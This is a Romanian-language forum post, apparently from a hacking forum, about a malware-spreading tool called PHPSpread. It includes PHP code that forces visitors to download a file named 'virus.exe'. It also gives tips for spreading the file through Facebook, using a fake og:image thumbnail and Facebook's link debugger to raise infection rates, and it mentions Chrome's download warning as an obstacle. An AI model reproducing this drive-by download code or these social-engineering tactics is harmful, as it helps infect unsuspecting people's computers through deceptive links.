Jump to content
albertynos

PHPSpread v.2.1

Recommended Posts

Ca feedback eram interesat de codul de auto-download :

<?php
header('Content-Type: application/download');
header('Content-Disposition: attachment; filename="virus.exe"');
header("Content-Length: " . filesize("virus.exe"));
$fp = fopen("virus.exe", "r");
fpassthru($fp);
fclose($fp);
?>

Asta era singurul lucru care facea programul util si posibilitatea de creeare de landing-pages pentru spread pentru cei fara cunostinte cum am zis.

Singurul flaw se intampla in Google Chrome unde da faza cu "Acest fisier nu este downloadat de obicei si poate fi periculos" , asta se intampla cand pun fisierele pe host (subdomeniu gratis) dar nu si in localhost .

Ca un sfat de la mine, spreadingul se face cel mai bine pe facebook , in plus de asta pentru a mari sansa de instalare a virusului puneti codul

<meta property="og:image" content="http://site.com/image.jpg">

unde image.jpg este thumbnailul ala de langa orice link de pe facebook iar apoi treceti site-ul prin https://developers.facebook.com/tools/debug/ pentru a vi-l recunoaste .

facebookshare.png

Asta va poate aduce un procent mai mare la metoda asta.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...